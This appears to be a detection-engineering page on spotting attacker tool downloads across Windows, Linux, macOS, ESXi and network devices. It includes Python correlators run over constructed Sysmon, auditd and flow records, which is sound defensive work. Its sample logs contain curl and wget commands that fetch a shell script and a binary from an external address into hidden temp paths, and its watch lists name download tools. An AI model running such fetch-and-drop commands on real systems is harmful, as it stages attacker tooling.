Unusual or uncommon processes initiate network connections to external destinations, followed by file creation (tools downloaded).

| Data Component | Name | Channel |
|---|---|---|
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| File Creation (DC0039) | WinEventLog:Sysmon | EventCode=11 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |

| Field | Description |
|---|---|
| ParentProcessName | Tune for known good updaters (e.g., ChromeUpdate, OneDrive) |
| DestinationIPCategory | Allow filtering by internal vs external IP blocks |
| FilePathRegex | Focus on uncommon file drop paths (e.g., C:\Users\Public\) |

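
The Windows analytic above is a sequence correlation across three Sysmon event types. The Python below is an added example (not code from this page, from Sysmon, or from any SIEM vendor): it joins EventCode 1, 3 and 11 by ProcessGuid, applies the three tunables from the table (parent-process allowlist, internal/external destination classification, drop-path regex), and runs over a constructed set of events. The allowlisted parent names, the internal address blocks, the five-minute window and every sample path and address are assumptions made for the example.

```python
"""Correlate Sysmon process creation (EventCode 1), network connection (3) and
file creation (11) events into "process reached out, then dropped a file"
alerts. Constructed example: the events below are hand-written dicts shaped
like parsed Sysmon fields, not real telemetry."""
import ipaddress
import re
from datetime import datetime, timedelta

# --- tuning knobs, one per mutable element in the table above ---
# ParentProcessName: parents whose children legitimately fetch and write files
# (constructed list; tune to the updaters present in your estate).
PARENT_ALLOWLIST = {"onedrive.exe", "googleupdate.exe"}
# DestinationIPCategory: anything outside these blocks counts as external.
INTERNAL_BLOCKS = [ipaddress.ip_network(n) for n in
                   ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# FilePathRegex: uncommon drop locations (the table suggests C:\Users\Public\).
FILE_PATH_REGEX = re.compile(r"^C:\\(Users\\Public|Windows\\Temp|ProgramData)\\", re.I)
# Maximum gap between the outbound connection and the file write (assumed value).
WINDOW = timedelta(minutes=5)


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in block for block in INTERNAL_BLOCKS)


def parse_time(s):
    # Sysmon UtcTime looks like "2024-05-01 12:00:05.123"
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Return one alert dict per (external connect -> file create) pair."""
    parent_of = {}     # ProcessGuid -> ParentImage, learned from EventCode 1
    last_connect = {}  # ProcessGuid -> (time, DestinationIp), from EventCode 3
    alerts = []
    for ev in sorted(events, key=lambda e: parse_time(e["UtcTime"])):
        guid, code, ts = ev["ProcessGuid"], ev["EventCode"], parse_time(ev["UtcTime"])
        if code == 1:
            parent_of[guid] = ev["ParentImage"]
            continue
        # ParentProcessName tuning: ignore children of known-good updaters.
        if basename(parent_of.get(guid, "")) in PARENT_ALLOWLIST:
            continue
        if code == 3 and is_external(ev["DestinationIp"]):
            last_connect[guid] = (ts, ev["DestinationIp"])
        elif code == 11 and guid in last_connect:
            conn_ts, dst = last_connect[guid]
            if ts - conn_ts <= WINDOW and FILE_PATH_REGEX.search(ev["TargetFilename"]):
                alerts.append({"ProcessGuid": guid, "Image": ev["Image"],
                               "ParentImage": parent_of.get(guid), "DestinationIp": dst,
                               "TargetFilename": ev["TargetFilename"]})
    return alerts


def _ev(code, guid, secs, **fields):
    return {"EventCode": code, "ProcessGuid": guid,
            "UtcTime": f"2024-05-01 12:00:{secs}", **fields}


# Constructed image paths used by the sample events.
SVC = r"C:\Users\alice\AppData\Local\Temp\svc.exe"
SETUP = r"C:\Program Files\OneDrive\OneDriveSetup.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FF = r"C:\Program Files\Mozilla Firefox\firefox.exe"

SAMPLE_EVENTS = [
    # G1: odd binary spawned by cmd.exe reaches out, then writes to C:\Users\Public -> alert
    _ev(1, "G1", "00.000", Image=SVC, ParentImage=r"C:\Windows\System32\cmd.exe"),
    _ev(3, "G1", "01.000", Image=SVC, DestinationIp="203.0.113.10"),
    _ev(11, "G1", "02.500", Image=SVC, TargetFilename=r"C:\Users\Public\update.exe"),
    # G2: same sequence, but the parent is an allowlisted updater -> suppressed
    _ev(1, "G2", "03.000", Image=SETUP,
        ParentImage=r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
    _ev(3, "G2", "04.000", Image=SETUP, DestinationIp="203.0.113.20"),
    _ev(11, "G2", "05.000", Image=SETUP, TargetFilename=r"C:\Users\Public\setup.exe"),
    # G3: the connection is internal -> not an ingress transfer for this analytic
    _ev(1, "G3", "06.000", Image=PS, ParentImage=r"C:\Windows\explorer.exe"),
    _ev(3, "G3", "07.000", Image=PS, DestinationIp="10.1.2.3"),
    _ev(11, "G3", "08.000", Image=PS, TargetFilename=r"C:\Users\Public\notes.txt"),
    # G4: external connect, but the file lands in a common user folder -> regex filters it
    _ev(1, "G4", "09.000", Image=FF, ParentImage=r"C:\Windows\explorer.exe"),
    _ev(3, "G4", "10.000", Image=FF, DestinationIp="198.51.100.7"),
    _ev(11, "G4", "11.000", Image=FF, TargetFilename=r"C:\Users\alice\Downloads\report.pdf"),
]


def run_sample():
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Only G1 survives the three filters. Note that EventCode 3 and 11 do not carry the parent image themselves, which is why the process-creation event (the third data component in the table) is needed to apply the ParentProcessName tuning at all.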

Shell-based tools (curl, wget, scp) initiate connections to external domains, followed by creation of executable files on disk.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | auditd:SYSCALL | connect, execve, write |
| File Creation (DC0039) | auditd:SYSCALL | file creation/modification |
| Network Traffic Flow (DC0078) | iptables:LOG | TCP connections |

| Field | Description |
|---|---|
| ToolName | Match on curl, wget, rsync, etc. based on environment |
| DownloadExtension | Tunable filter to limit to suspicious file types (.sh, .bin, .elf) |

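
The Linux analytic keys on auditd SYSCALL records for execve of download tools. The Python below is an added example (not part of this page or of the audit framework): it parses auditd's `type=... msg=audit(ts:serial): key=value` records, ties the SYSCALL and EXECVE records of one execve together by serial number, rebuilds argv (including the hex-encoded arguments auditd emits for values with spaces or quotes), works out where the tool writes, and applies the ToolName and DownloadExtension tunables. The log lines are constructed in auditd's format as if produced by an execve rule keyed `download_tools`; the tool list, extension list and every path and address are assumptions.

```python
"""Parse auditd SYSCALL/EXECVE record pairs for download tools and flag the
invocations whose output file carries a suspicious extension. Constructed
example: the log lines below are hand-written in auditd's format, not
captured logs."""
import os
import re
from urllib.parse import urlparse

# ToolName: download utilities worth watching (constructed list, tune per environment).
TOOL_NAMES = {"curl", "wget", "scp", "rsync"}
# DownloadExtension: file types that should rarely arrive from outside.
SUSPICIOUS_EXTS = {".sh", ".bin", ".elf", ".so"}
# Flags that name the output file for each tool.
OUTPUT_FLAGS = {"curl": {"-o", "--output"}, "wget": {"-O", "--output-document"}}

RECORD_RE = re.compile(
    r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_record(line):
    """One auditd line -> dict of its fields, or None if it is not an audit record."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    rec = {"type": m.group("type"), "serial": int(m.group("serial")), "ts": float(m.group("ts"))}
    for key, raw, quoted, bare in KV_RE.findall(m.group("rest")):
        if raw.startswith('"'):
            rec[key] = quoted
        elif rec["type"] == "EXECVE" and re.fullmatch(r"a\d+", key):
            # auditd hex-encodes argv entries that contain spaces, quotes or control chars
            rec[key] = bytes.fromhex(bare).decode("utf-8", "replace")
        else:
            rec[key] = bare
    return rec


def group_by_serial(lines):
    """auditd emits several records per event; the serial number ties them together."""
    groups = {}
    for line in lines:
        rec = parse_record(line)
        if rec:
            groups.setdefault(rec["serial"], {})[rec["type"]] = rec
    return groups


def argv_of(execve):
    return [execve[f"a{i}"] for i in range(int(execve["argc"]))]


def output_path(tool, argv):
    """Where the tool writes: explicit -o/-O target, scp/rsync destination, else URL basename."""
    flags = OUTPUT_FLAGS.get(tool, set())
    for i, arg in enumerate(argv[:-1]):
        if arg in flags:
            return argv[i + 1]
    if tool in ("scp", "rsync") and len(argv) >= 3:
        return argv[-1]
    for arg in argv[1:]:
        if "://" in arg:
            return os.path.basename(urlparse(arg).path) or None
    return None


def find_suspicious_downloads(lines):
    alerts = []
    for serial, recs in sorted(group_by_serial(lines).items()):
        sc, ex = recs.get("SYSCALL"), recs.get("EXECVE")
        if not (sc and ex) or sc.get("success") != "yes":
            continue
        tool = sc.get("comm")
        if tool not in TOOL_NAMES:
            continue
        argv = argv_of(ex)
        path = output_path(tool, argv)
        if path and os.path.splitext(path)[1].lower() in SUSPICIOUS_EXTS:
            alerts.append({"serial": serial, "uid": sc.get("uid"), "tool": tool,
                           "path": path, "cmd": " ".join(argv)})
    return alerts


# Constructed sample: serial 501 is a curl drop of a .sh file, 503 a wget drop of a .bin
# into a hex-encoded path, 502 a harmless PDF fetch and 504 an unrelated execve.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1714561200.101:501): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1234 auid=1000 uid=1000 comm="curl" exe="/usr/bin/curl" key="download_tools"
type=EXECVE msg=audit(1714561200.101:501): argc=5 a0="curl" a1="-s" a2="-o" a3="/tmp/.cache/agent.sh" a4="http://203.0.113.5/agent.sh"
type=SYSCALL msg=audit(1714561200.102:502): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1235 auid=1000 uid=1000 comm="wget" exe="/usr/bin/wget" key="download_tools"
type=EXECVE msg=audit(1714561200.102:502): argc=2 a0="wget" a1="http://203.0.113.5/docs/report.pdf"
type=SYSCALL msg=audit(1714561200.103:503): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1236 auid=1000 uid=1000 comm="wget" exe="/usr/bin/wget" key="download_tools"
type=EXECVE msg=audit(1714561200.103:503): argc=4 a0="wget" a1="-O" a2=2f746d702f7820792e62696e a3="http://203.0.113.5/x"
type=SYSCALL msg=audit(1714561200.104:504): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1237 auid=1000 uid=1000 comm="ls" exe="/usr/bin/ls" key="download_tools"
type=EXECVE msg=audit(1714561200.104:504): argc=2 a0="ls" a1="-la"
""".splitlines()


def run_sample():
    return find_suspicious_downloads(SAMPLE_AUDIT_LOG)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Serials 501 and 503 are reported; 502 is filtered by extension and 504 by tool name. The same ToolName and output-path tunables are what the macOS and ESXi tables below adjust, with the event source swapped for Endpoint Security or hostd records.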

Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:endpointsecurity | ES_EVENT_TYPE_NOTIFY_EXEC |
| File Creation (DC0039) | macos:unifiedlog | file write/create |
| Network Connection Creation (DC0082) | macos:unifiedlog | connection open |

| Field | Description |
|---|---|
| DirectoryTargeted | Restrict to high-risk directories like /Users/Shared, /tmp/ |
| ProcessPath | May tune based on custom tooling or MDM activity |

Command line interface or vCLI triggers a remote transfer using wget or curl, writing files into datastore paths or local tmp directories.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | esxi:hostd | command execution |
| File Creation (DC0039) | esxi:vmkernel | file write |

| Field | Description |
|---|---|
| ToolName | Tune for wget, curl, netcat, and scripting languages in use |
| DatastorePath | Filter or prioritize specific paths (e.g., /vmfs/volumes/) |

Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks.

| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Flow (DC0078) | NSM:Flow | connection metadata |
| File Creation (DC0039) | snmp:syslog | firmware write/log event |

| Field | Description |
|---|---|
| PayloadVolumeThreshold | Tune based on expected update size vs anomalous bulk data transfers |
| ProtocolUsed | Flag unexpected protocols like TFTP, FTP, HTTP |
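
The network-device analytic works from flow metadata rather than host events, so its two tunables are a protocol check and a volume threshold. The Python below is an added example (not part of this page or of any NSM product): it classifies flows into managed devices by transport/port against a list of protocols not expected to carry files, and it sums inbound bytes per source/destination pair over a sliding window so that a bulk transfer split into many small flows still trips the PayloadVolumeThreshold. The device inventory, the expected update sizes per device class, the 50% slack, the 30-minute window and all flow records are constructed for the example.

```python
"""Flag ingress transfers to network devices from flow metadata: unexpected
transfer protocols and bulk payload volumes that exceed the size of a normal
firmware or config update. Constructed example: the flow records and the
device inventory below are hand-written, not captured NSM data."""
from collections import defaultdict
from datetime import datetime, timedelta

# ProtocolUsed: transport/port pairs that should not carry files to devices
# (constructed mapping; the table names TFTP, FTP and HTTP).
UNEXPECTED_PROTOCOLS = {("udp", 69): "TFTP", ("tcp", 21): "FTP", ("tcp", 80): "HTTP"}
# PayloadVolumeThreshold: largest expected update per device class, in bytes.
# The inventory and sizes are assumptions of this example.
DEVICE_CLASS = {"192.0.2.10": "core-switch", "192.0.2.20": "branch-router", "192.0.2.30": "ap"}
EXPECTED_UPDATE_BYTES = {"core-switch": 400_000_000, "branch-router": 150_000_000, "ap": 30_000_000}
SLACK = 1.5                                 # tolerate 50% above the expected update size
AGGREGATION_WINDOW = timedelta(minutes=30)  # bulk copies are often split into many flows


def protocol_alerts(flows):
    """Flows into a managed device over a protocol we do not expect to carry files."""
    alerts = []
    for f in flows:
        name = UNEXPECTED_PROTOCOLS.get((f["proto"], f["dst_port"]))
        if f["dst"] in DEVICE_CLASS and name:
            alerts.append({"src": f["src"], "dst": f["dst"], "protocol": name,
                           "bytes_in": f["bytes_in"]})
    return alerts


def volume_alerts(flows):
    """Sum inbound bytes per (src, dst) inside a sliding window and alert once per
    pair when the total exceeds the expected update size for that device class."""
    alerts, seen = [], set()
    by_pair = defaultdict(list)
    for f in sorted(flows, key=lambda f: f["start"]):
        if f["dst"] in DEVICE_CLASS:
            by_pair[(f["src"], f["dst"])].append(f)
    for (src, dst), recs in by_pair.items():
        limit = EXPECTED_UPDATE_BYTES[DEVICE_CLASS[dst]] * SLACK
        window, total = [], 0
        for f in recs:
            window.append(f)
            total += f["bytes_in"]
            # drop flows that started more than AGGREGATION_WINDOW before this one
            while f["start"] - window[0]["start"] > AGGREGATION_WINDOW:
                total -= window.pop(0)["bytes_in"]
            if total > limit and (src, dst) not in seen:
                seen.add((src, dst))
                alerts.append({"src": src, "dst": dst, "bytes_in_window": total,
                               "limit": int(limit)})
    return alerts


T0 = datetime(2024, 5, 1, 2, 0, 0)


def _flow(minute, src, dst, proto, dst_port, bytes_in):
    return {"start": T0 + timedelta(minutes=minute), "src": src, "dst": dst,
            "proto": proto, "dst_port": dst_port, "bytes_in": bytes_in}


SAMPLE_FLOWS = [
    # routine 120 MB image pushed to the branch router over SSH from the management host: fine
    _flow(0, "10.0.0.5", "192.0.2.20", "tcp", 22, 120_000_000),
    # TFTP from a workstation to the core switch: protocol alert, even though it is small
    _flow(5, "10.0.3.44", "192.0.2.10", "udp", 69, 2_000_000),
    # four 20 MB chunks to the access point inside 30 minutes: volume alert at the third
    _flow(10, "10.0.3.44", "192.0.2.30", "tcp", 443, 20_000_000),
    _flow(15, "10.0.3.44", "192.0.2.30", "tcp", 443, 20_000_000),
    _flow(20, "10.0.3.44", "192.0.2.30", "tcp", 443, 20_000_000),
    _flow(25, "10.0.3.44", "192.0.2.30", "tcp", 443, 20_000_000),
    # large HTTP download to an ordinary server, not a network device: ignored
    _flow(30, "10.0.3.44", "10.0.0.80", "tcp", 80, 500_000_000),
]


def run_sample():
    return protocol_alerts(SAMPLE_FLOWS), volume_alerts(SAMPLE_FLOWS)


if __name__ == "__main__":
    proto, volume = run_sample()
    print("protocol alerts:", proto)
    print("volume alerts:", volume)
```

The TFTP flow is caught by protocol alone, and the access point is flagged when the window total reaches 60 MB against a 45 MB limit, which a per-flow size check would have missed.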